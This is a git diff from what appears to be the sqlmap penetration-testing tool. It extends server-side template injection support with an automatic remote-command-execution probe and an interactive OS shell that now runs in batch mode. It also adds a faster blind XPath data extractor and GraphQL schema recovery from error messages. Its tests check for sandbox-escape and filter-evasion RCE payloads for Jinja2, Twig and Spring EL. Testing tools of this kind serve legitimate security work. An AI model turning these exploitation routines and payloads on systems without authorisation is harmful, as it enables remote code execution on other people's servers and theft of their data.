- (bestEvidence.get("boolean") and _booleanUniquelyIdentifies(bestEngine))): + (bestEvidence.get("boolean") and _booleanUniquelyIdentifies(bestEngine)) or + (bestEvidence.get("family") and _familyUniquelyIdentifies(bestEngine))): pass # specific engine name stands else: bestEngine = bestEngine._replace( @@ -474,10 +575,10 @@ def sstiScan(): global SENTINEL SENTINEL = randomStr(length=10, lowercase=True) - infoMsg = "'--ssti' is self-contained: it detects SSTI and fingerprints " - infoMsg += "common template engines when possible. SQL enumeration " - infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" - logger.info(infoMsg) + debugMsg = "'--ssti' is self-contained: it detects SSTI and fingerprints " + debugMsg += "common template engines when possible. SQL enumeration " + debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" + logger.debug(debugMsg) if not conf.paramDict: logger.error("no request parameters to test (use --data, GET params, or similar)") @@ -502,7 +603,7 @@ def sstiScan(): beep() if engine.arithmeticFmt: - payload = _originalValue(place, parameter) + (engine.arithmeticFmt % (7, 7)) + payload = _originalValue(place, parameter) + _arithmeticPayload(engine.arithmeticFmt, 7, 7) else: payload = _originalValue(place, parameter) + engine.booleanTrue title = "SSTI %s injection" % engine.name @@ -530,18 +631,27 @@ def sstiScan(): if found: slot = found[0] place, parameter, engine, evidence = slot + from lib.core.common import readInput + + wantsTakeover = any(conf.get(_) for _ in ("osCmd", "osShell", "sstiQuery", "sstiShell")) + + # If the user did not ask for exploitation, confirm (benignly) whether OS command + # execution is reachable and, if so, advise the relevant switches. + if not wantsTakeover and _canTakeover(engine, evidence) and _probeRce(place, parameter, engine): + logger.info("the back-end '%s' allows OS command execution via this injection; " + "you are advised to try '--os-shell' (interactive) or " + "'--os-cmd=' (single command)" % engine.name) # --ssti-query: user-provided expression evaluated in-band if conf.get("sstiQuery"): _evalExpression(place, parameter, engine, conf.sstiQuery) - # --ssti-shell: interactive expression evaluation loop + # --ssti-shell: interactive expression evaluation loop (interactive even under --batch, + # like sqlmap's SQL --sql-shell/--os-shell, which read straight from the terminal) if conf.get("sstiShell"): - infoMsg = "calling SSTI shell. Enter expressions (e.g. 7*7) or 'exit'/'quit' to leave" - logger.info(infoMsg) - from lib.core.common import readInput + logger.info("calling SSTI shell. Enter expressions (e.g. 7*7) or 'exit'/'quit' to leave") while True: - expr = readInput("ssti-shell> ") + expr = readInput("ssti-shell> ", checkBatch=False) if not expr or expr.strip().lower() in ("exit", "quit"): break _evalExpression(place, parameter, engine, expr.strip()) @@ -555,18 +665,15 @@ def sstiScan(): if conf.get("osCmd"): _executeCommand(place, parameter, engine, conf.osCmd) + # Interactive shell runs even under --batch (mirrors the SQL --os-shell, which + # reads commands straight from the terminal); EOF / 'exit' / 'quit' leaves it. if conf.get("osShell"): - if conf.get("batch"): - logger.info("skipping interactive OS shell in batch mode") - else: - infoMsg = "calling SSTI OS shell. Enter commands or 'exit'/'quit' to leave" - logger.info(infoMsg) - from lib.core.common import readInput - while True: - cmd = readInput("os-shell> ") - if not cmd or cmd.strip().lower() in ("exit", "quit"): - break - _executeCommand(place, parameter, engine, cmd.strip()) + logger.info("calling SSTI OS shell. Enter commands or 'exit'/'quit' to leave") + while True: + cmd = readInput("os-shell> ", checkBatch=False) + if not cmd or cmd.strip().lower() in ("exit", "quit"): + break + _executeCommand(place, parameter, engine, cmd.strip()) logger.info("SSTI scan complete") @@ -590,9 +697,9 @@ def _evalExpression(place, parameter, engine, expr): # Three-part payload: marker, expression, marker -- each in its own template tag # so the expression is evaluated independently of the markers - payload = original + (engine.expressionFmt % ("'%s'" % startMarker)) - payload += " " + (engine.expressionFmt % expr) - payload += " " + (engine.expressionFmt % ("'%s'" % endMarker)) + payload = original + _expressionPayload(engine.expressionFmt, "'%s'" % startMarker) + payload += " " + _expressionPayload(engine.expressionFmt, expr) + payload += " " + _expressionPayload(engine.expressionFmt, "'%s'" % endMarker) page = _send(place, parameter, payload) if not page: @@ -638,6 +745,24 @@ def _canTakeover(engine, evidence): return True +def _probeRce(place, parameter, engine): + """Benign, quiet RCE-capability check: run `echo ` via the engine's RCE payloads and + return True if the marker is reflected (proving OS command execution is reachable). Used only + to advise the user; it has no side effect beyond echoing a random token.""" + + if not engine.rcePayloads: + return False + + marker = randomStr(length=12, lowercase=True) + original = _originalValue(place, parameter) or "" + for payloadTemplate, _description in engine.rcePayloads: + payload = payloadTemplate.replace("{CMD}", "echo %s" % marker) + page = _send(place, parameter, original + payload) + if page and marker in getUnicode(page): + return True + return False + + def _executeCommand(place, parameter, engine, cmd): """Execute an OS command via the engine's RCE payloads, trying each fallback in order until one produces output. Captures output via baseline diff.""" diff --git a/lib/techniques/xpath/inject.py b/lib/techniques/xpath/inject.py index 32d8e6934..bd40548be 100644 --- a/lib/techniques/xpath/inject.py +++ b/lib/techniques/xpath/inject.py @@ -308,6 +308,20 @@ class _XPathPayloadBuilder(object): def textStartsWith(self, path, prefix): return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix))) + def stringLengthAtLeast(self, target, n): + return self._make("string-length(%s)>=%d" % (target, n)) + + def charPresent(self, target, pos): + # True when the character at 1-based position `pos` of `target` belongs to + # the known ordered charset (so its index can be resolved by bisection). + return self._make("contains(%s,substring(%s,%d,1))" % (_CS_LITERAL, target, pos)) + + def charIndexAtLeast(self, target, pos, n): + # The 0-based index of a charset member equals the length of the charset + # prefix preceding it (XPath 1.0 has no lexicographic '<', but + # string-length(substring-before(...)) yields a number we can bisect on). + return self._make("string-length(substring-before(%s,substring(%s,%d,1)))>=%d" % (_CS_LITERAL, target, pos, n)) + def _makeOracle(place, parameter, template): """Build an oracle from a verified true template. extract(payload) returns @@ -360,6 +374,11 @@ for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1): if _ not in _META_ORDS and _ not in _CHARSET: _CHARSET.append(_) +# Codepoint-ordered charset used by the binary-search extractor. Ordering here MUST match +# the literal string `_CS_LITERAL` so that a recovered index maps back to the right character. +_CS_ORDS = [_ for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1) if _ not in _META_ORDS] +_CS_LITERAL = _xpathQuote("".join(chr(_) for _ in _CS_ORDS)) + def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH): """Blindly infer a string value at `path` using `getter(builder, path, prefix)`. @@ -407,6 +426,52 @@ def _inferCount(oracle, builder, path, countFn, maxCount=128): return lo +def _inferString(oracle, builder, target, maxLen=XPATH_MAX_LENGTH): + """Blindly recover the string value of XPath expression `target` (e.g. + "name(/*)" or "string(/*[1]/@*[1])") using binary search. + + The length is bisected first, then each character is resolved by bisecting + its index inside the ordered charset. This needs ~log2(len) requests per + character versus the linear charset scan in _inferValue(), which matters a + lot when walking a whole document tree. Characters outside the charset are + surfaced as '?' so the rest of the value is still recovered.""" + + if not oracle.extract(builder.stringLengthAtLeast(target, 1)): + return None + + lo, hi = 1, maxLen + while lo < hi: + mid = (lo + hi + 1) // 2 + if oracle.extract(builder.stringLengthAtLeast(target, mid)): + lo = mid + else: + hi = mid - 1 + length = lo + + chars = [] + probes = 0 + last = len(_CS_ORDS) - 1 + for pos in xrange(1, length + 1): + probes += 1 + if not oracle.extract(builder.charPresent(target, pos)): + chars.append("?") + continue + + clo, chi = 0, last + while clo < chi: + cmid = (clo + chi + 1) // 2 + probes += 1 + if oracle.extract(builder.charIndexAtLeast(target, pos, cmid)): + clo = cmid + else: + chi = cmid - 1 + chars.append(chr(_CS_ORDS[clo])) + + value = "".join(chars) + logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, length)) + return value or None + + def _walkTree(oracle, builder, path="/*", depth=0): """Recursively walk the XML tree from a given XPath expression. Returns a dict: {name, path, children, attributes, text} or None.""" @@ -414,8 +479,7 @@ def _walkTree(oracle, builder, path="/*", depth=0): if depth > XPATH_MAX_DEPTH: return None - name = _inferValue(oracle, builder, path, - lambda b, p, prefix: b.nameStartsWith(p, prefix)) + name = _inferString(oracle, builder, "name(%s)" % path) if not name: return None @@ -431,20 +495,17 @@ def _walkTree(oracle, builder, path="/*", depth=0): attributes = [] for i in xrange(1, attrCount + 1): - attrName = _inferValue(oracle, builder, path, - lambda b, p, prefix, idx=i: b.attributeNameStartsWith(p, idx, prefix)) + attrName = _inferString(oracle, builder, "name(%s/@*[%d])" % (path, i)) if not attrName: continue - attrValue = _inferValue(oracle, builder, path, - lambda b, p, prefix, idx=i: b.attributeValueStartsWith(p, idx, prefix)) + attrValue = _inferString(oracle, builder, "string(%s/@*[%d])" % (path, i)) attributes.append({"name": attrName, "value": attrValue or ""}) logger.info(" attribute: @%s='%s'" % (attrName, attrValue or "")) text = None if childCount == 0: - text = _inferValue(oracle, builder, path, - lambda b, p, prefix: b.textStartsWith(p, prefix)) + text = _inferString(oracle, builder, "string(%s)" % path) children = [] for i in xrange(1, childCount + 1): @@ -511,10 +572,10 @@ def xpathScan(): global SENTINEL SENTINEL = randomStr(length=10, lowercase=True) - infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP " - infoMsg += "parameters and walks the reachable XML document tree. SQL enumeration " - infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" - logger.info(infoMsg) + debugMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP " + debugMsg += "parameters and walks the reachable XML document tree. SQL enumeration " + debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" + logger.debug(debugMsg) if not conf.paramDict: logger.error("no request parameters to test (use --data, GET params, or similar)") diff --git a/tests/test_graphql.py b/tests/test_graphql.py index 753c5dba3..5be9d901b 100644 --- a/tests/test_graphql.py +++ b/tests/test_graphql.py @@ -727,5 +727,67 @@ class TestGraphqlUnicodeSafety(unittest.TestCase): self.assertIn("caf", gi._cell(u"caf\xe9")) +class TestGraphqlSuggestionRecovery(unittest.TestCase): + """G1: schema recovery from 'Did you mean' suggestions when introspection is disabled.""" + + def setUp(self): + self._gql = gi._gqlSend + + def tearDown(self): + gi._gqlSend = self._gql + + def test_harvest_suggestions_both_quote_styles(self): + # graphql-js uses double quotes; some servers use single quotes + Oxford 'or' + self.assertEqual( + gi._harvestSuggestions('Cannot query field "x" on type "Query". Did you mean "user" or "search"?'), + ["user", "search"]) + self.assertEqual( + gi._harvestSuggestions("Cannot query field 'x' on type 'Query'. Did you mean 'user', 'me', or 'node'?"), + ["user", "me", "node"]) + self.assertEqual(gi._harvestSuggestions("no suggestion here"), []) + + def test_suggest_fields_from_validation_errors(self): + # An unknown field elicits the closest real field names (graphql-js phrasing) + def fake(endpoint, query, variables=None): + if "{ user }" in query or "{user}" in query: + return '{"data":{"user":null}}', 200 # 'user' is a real (resolving) field + return ('{"errors":[{"message":"Cannot query field \\"%s\\" on type \\"Query\\". ' + 'Did you mean \\"user\\", \\"search\\" or \\"login\\"?"}]}' + % "zz", 200) + gi._gqlSend = fake + fields = gi._suggestFields("http://t/graphql", "query") + for expected in ("user", "search", "login"): + self.assertIn(expected, fields) + + def test_suggest_args_from_unknown_argument(self): + def fake(endpoint, query, variables=None): + return ('{"errors":[{"message":"Unknown argument \\"zz\\" on field \\"Query.user\\". ' + 'Did you mean \\"username\\"?"}]}', 200) + gi._gqlSend = fake + self.assertIn("username", gi._suggestArgs("http://t/graphql", "query", "user")) + + def test_introspect_via_suggestions_builds_slots(self): + def fake(endpoint, query, variables=None): + # introspection-style queries already filtered upstream; here every unknown field + # yields the same suggestion set, and 'search' resolves as a real field + if "{ search }" in query or "{search}" in query: + return '{"data":{"search":[]}}', 200 + if "Unknown argument" in query: # never matches; args fall back to wordlist + return '{}', 200 + return ('{"errors":[{"message":"Cannot query field \\"zz\\" on type \\"Query\\". ' + 'Did you mean \\"search\\"?"}]}', 200) + gi._gqlSend = fake + slots = gi._introspectViaSuggestions("http://t/graphql") + self.assertIsNotNone(slots) + self.assertTrue(any(s.fieldName == "search" for s in slots)) + self.assertTrue(all(s.strategy == "string" for s in slots)) + + def test_introspect_via_suggestions_none_without_suggestions(self): + def fake(endpoint, query, variables=None): + return '{"errors":[{"message":"Syntax Error: unexpected token"}]}', 200 + gi._gqlSend = fake + self.assertIsNone(gi._introspectViaSuggestions("http://t/graphql")) + + if __name__ == "__main__": unittest.main() diff --git a/tests/test_ssti.py b/tests/test_ssti.py index 738ae3d95..02ff44f35 100644 --- a/tests/test_ssti.py +++ b/tests/test_ssti.py @@ -313,10 +313,13 @@ class TestBooleanUniqueness(unittest.TestCase): jinja2 = ssti._ENGINE_TABLE[0] self.assertTrue(ssti._booleanUniquelyIdentifies(jinja2)) - def test_freemarker_boolean_not_unique(self): + def test_freemarker_boolean_unique_with_computer_format(self): freemarker = [e for e in ssti._ENGINE_TABLE if e.name == "Freemarker"][0] - # Freemarker and SpringEL both use ("${}", "true", "false") signature - self.assertFalse(ssti._booleanUniquelyIdentifies(freemarker)) + # FreeMarker uses ${true?c} (computer-format), distinct from SpringEL's ${true} and + # Mako's ${True}, so its boolean rendering now uniquely identifies it within the ${ } family + self.assertTrue(ssti._booleanUniquelyIdentifies(freemarker)) + spring = [e for e in ssti._ENGINE_TABLE if "Spring" in e.name][0] + self.assertTrue(ssti._booleanUniquelyIdentifies(spring)) def test_jinja2_with_arithmetic_and_boolean_is_exact(self): """Arithmetic + boolean (unique) should produce exact engine name, @@ -467,3 +470,142 @@ class TestCommandEscaping(unittest.TestCase): self.assertEqual(ssti._escapeSingleQuoted("hello"), "hello") self.assertEqual(ssti._escapeSingleQuoted("it's"), "it\\'s") self.assertEqual(ssti._escapeSingleQuoted("a\\b"), "a\\\\b") + + +class TestEngineMatrix(unittest.TestCase): + """For EVERY engine in the table, stand up a faithful mock server running that + engine and assert _fingerprint() identifies it. This proves each engine's full + detection path (arithmetic/boolean/error/distinguishing) actually works end to + end - not just Jinja2 - and guards against regressions like the ERB '%>' format + bug where a delimiter containing '%' silently disabled arithmetic detection.""" + + def setUp(self): + self.original_send = ssti._send + + def tearDown(self): + ssti._send = self.original_send + + # Digit-free, boolean-word-free sample errors that match each engine's errorRegex. + # (digit/boolean-free so a sibling engine's boolean probe falling through to the error + # branch on this server is still correctly rejected.) + _ERRORS = { + "Jinja2": "jinja2.exceptions.TemplateSyntaxError: unexpected end of template", + "Mako": "mako.exceptions.SyntaxException: unclosed control structure", + "Twig": "Twig_Error_Syntax: unexpected token in template", + "Freemarker": "freemarker.core.ParseException: encountered unexpected directive", + "Velocity": "org.apache.velocity.runtime.parser.ParseErrorException: encountered eof", + "Spring EL / Thymeleaf": "org.springframework.expression.spel.SpelParseException: bad node", + "ERB": "(erb): syntax error, unexpected end-of-input", + "Pug/Jade": "pug: unexpected token in template", + "Handlebars": "Handlebars: Parse error on line one", + } + + # Real divide-by-zero error text per language family (captured from live Mako/ERB/Jinja2 + # backends), so the S2 family probe can be exercised. JS yields Infinity (no error). + _DIVZERO = { + "python": "ZeroDivisionError: division by zero", + "ruby": "ZeroDivisionError: divided by 0", + "php": "DivisionByZeroError: Division by zero", + "java": "java.lang.ArithmeticException: / by zero", + "nodejs": "Hello Infinity", + } + + @staticmethod + def _make_server(engine, errors): + import re + op = re.escape(engine.delimiter) + cl = re.escape(engine.delimiterClose) + arithRe = re.compile(op + r"\s*(\d+)\s*\*\s*(\d+)\s*" + cl) if engine.arithmeticFmt else None + divZero = TestEngineMatrix._DIVZERO + err = errors.get(engine.name) + + def server(place, parameter, value): + # 1) engine-specific distinguishing probe + if engine.distinguishingProbe and engine.distinguishingProbe in value: + if engine.distinguishingResult: + return "Hello " + engine.distinguishingResult + return "Hello" # comment-style probe -> stays at baseline + # 2) this engine's own boolean rendering + if engine.booleanTrue and engine.booleanTrue in value: + return "Hello " + engine.trueRendered + if engine.booleanFalse and engine.booleanFalse in value: + return "Hello " + engine.falseRendered + # 3) divide-by-zero -> language-family-specific error (S2), for engines that evaluate it + if arithRe is not None and (engine.delimiter + "1/0" + engine.delimiterClose) in value: + return divZero.get(engine.family, "Hello") + # 4) arithmetic, but ONLY for engines that actually evaluate it + if arithRe is not None: + m = arithRe.search(value) + if m: + return "Hello %d" % (int(m.group(1)) * int(m.group(2))) + # 5) malformed fragment in this engine's delimiter -> engine-specific error + if err and any(p in value for p in engine.errorProbes): + return err + # 6) anything else (incl. other engines' payloads) renders inertly + return "Hello" + + return server + + def test_every_engine_is_fingerprinted(self): + for engine in ssti._ENGINE_TABLE: + ssti._send = self._make_server(engine, self._ERRORS) + result, evidence = ssti._fingerprint("GET", "q") + self.assertIsNotNone(result, "engine '%s' was not detected at all" % engine.name) + self.assertIn(engine.name, result.name, + "server running '%s' was identified as '%s'" % (engine.name, result.name)) + + def test_family_probe_confirms_language(self): + # S2: the divide-by-zero probe must confirm the backend family for every + # expression-evaluating, non-JS engine (Python/Ruby/PHP/Java). + for engine in ssti._ENGINE_TABLE: + if not (engine.arithmeticFmt and engine.delimiterClose): + continue + if engine.family not in ("python", "ruby", "php", "java"): + continue + ssti._send = self._make_server(engine, self._ERRORS) + _result, evidence = ssti._fingerprint("GET", "q") + self.assertTrue(evidence.get("family"), + "family probe should confirm '%s' on a %s backend" % (engine.name, engine.family)) + + def test_filter_evasion_rce_fallbacks_present(self): + # S3: each engine must retain its filter-evasion / sandbox-escape RCE fallbacks. + def rce(name): + return " ".join(p for p, _d in next(e for e in ssti._ENGINE_TABLE if e.name == name).rcePayloads) + jinja = rce("Jinja2") + self.assertIn("attr(", jinja) # dot/underscore-free attr() chain + self.assertIn("\\x5f", jinja) # hex-escaped dunders + twig = rce("Twig") + self.assertIn("sort('system')", twig) + self.assertIn("map('system')", twig) + spring = rce("Spring EL / Thymeleaf") + self.assertIn("readLine", spring) # output-capturing SpEL + self.assertIn("@java.lang.Runtime@getRuntime", spring) # OGNL fallback + + def test_family_probe_does_not_crossmatch(self): + # Python 'division by zero' must NOT satisfy the (case-sensitive) PHP signature, so a + # Jinja2/Python server never lets Twig/PHP claim a family match. + jinja = next(e for e in ssti._ENGINE_TABLE if e.name == "Jinja2") + ssti._send = self._make_server(jinja, self._ERRORS) + cache = {} + twig = next(e for e in ssti._ENGINE_TABLE if e.name == "Twig") + self.assertEqual(ssti._probeFamily("GET", "q", jinja, cache), "python") + self.assertNotEqual(ssti._probeFamily("GET", "q", twig, cache), twig.family) + + def test_erb_arithmetic_works_after_format_fix(self): + # Direct regression guard for the '<%= %d*%d %>' / '<%= %s %>' format bug. + erb = next(e for e in ssti._ENGINE_TABLE if e.name == "ERB") + ssti._send = self._make_server(erb, self._ERRORS) + self.assertTrue(ssti._probeArithmetic("GET", "q", erb), + "ERB arithmetic proof must succeed once %-format no longer crashes on '%>'") + result, evidence = ssti._fingerprint("GET", "q") + self.assertEqual(result.name, "ERB") + self.assertTrue(evidence.get("arithmetic")) + + def test_mako_distinguished_from_freemarker_spring(self): + # Mako shares '${ }' with Freemarker/Spring but renders capital True/False; + # it must be named exactly (via unique boolean rendering), not "probable". + mako = next(e for e in ssti._ENGINE_TABLE if e.name == "Mako") + ssti._send = self._make_server(mako, self._ERRORS) + result, evidence = ssti._fingerprint("GET", "q") + self.assertEqual(result.name, "Mako") + self.assertTrue(evidence.get("boolean")) diff --git a/tests/test_xpath.py b/tests/test_xpath.py index 9da940016..61e8587e9 100644 --- a/tests/test_xpath.py +++ b/tests/test_xpath.py @@ -252,6 +252,40 @@ class TestExtraction(unittest.TestCase): maxCount=8) self.assertEqual(result, expected) + def test_infer_string_binary_search(self): + # Drive the binary-search extractor through real lxml evaluation of the + # boundary-wrapped predicates against _XML and confirm exact recovery. + boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"] + builder = xpath._XPathPayloadBuilder("x", boundary) + template = _XPATH_TEMPLATES["function_arg"] + + class MockOracle(object): + def extract(self, payload): + return _xpath_eval(template, payload) > 0 + + oracle = MockOracle() + # Absolute targets are resolved the same way the live tree-walk would. + self.assertEqual(xpath._inferString(oracle, builder, "name(/*)", maxLen=32), "directory") + self.assertEqual(xpath._inferString(oracle, builder, "string(//user[1]/name)", maxLen=32), "luther") + self.assertEqual(xpath._inferString(oracle, builder, "string(//user[1]/@id)", maxLen=32), "1") + + def test_infer_string_matches_linear(self): + # The fast extractor must agree with the legacy linear extractor. + boundary = xpath._BREAKOUT_BOUNDARY["') or true() or ('"] + builder = xpath._XPathPayloadBuilder("x", boundary) + template = _XPATH_TEMPLATES["function_arg"] + + class MockOracle(object): + def extract(self, payload): + return _xpath_eval(template, payload) > 0 + + oracle = MockOracle() + fast = xpath._inferString(oracle, builder, "name(/*)", maxLen=32) + linear = xpath._inferValue(oracle, builder, "/*", + lambda b, p, prefix: b.nameStartsWith(p, prefix), + maxLen=32) + self.assertEqual(fast, linear) + class TestBackendFingerprint(unittest.TestCase): def test_lxml(self): @@ -323,7 +357,7 @@ class TestRealXPathSyntax(unittest.TestCase): "False payload '%s' should match no nodes" % falsePayload) # Extraction predicate must be valid and change the result truthfully - builder = xpath._XPathPayloadBuilder(original, boundary) + self.assertIsNotNone(xpath._XPathPayloadBuilder(original, boundary)) truePred = xpath._makePayload(original, boundary, "true()") falsePred = xpath._makePayload(original, boundary, "false()") self.assertGreater(self._count(template, truePred), 0, @@ -368,7 +402,7 @@ class TestRealXPathSyntax(unittest.TestCase): boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"] # Simulate what xpathScan() does: use a sentinel as base for OR-style sentinel = "zzznotpresent" - builder = xpath._XPathPayloadBuilder(sentinel, boundary) + self.assertIsNotNone(xpath._XPathPayloadBuilder(sentinel, boundary)) truePred = xpath._makePayload(sentinel, boundary, "true()") falsePred = xpath._makePayload(sentinel, boundary, "false()") tpl = _XPATH_TEMPLATES["single_quoted"]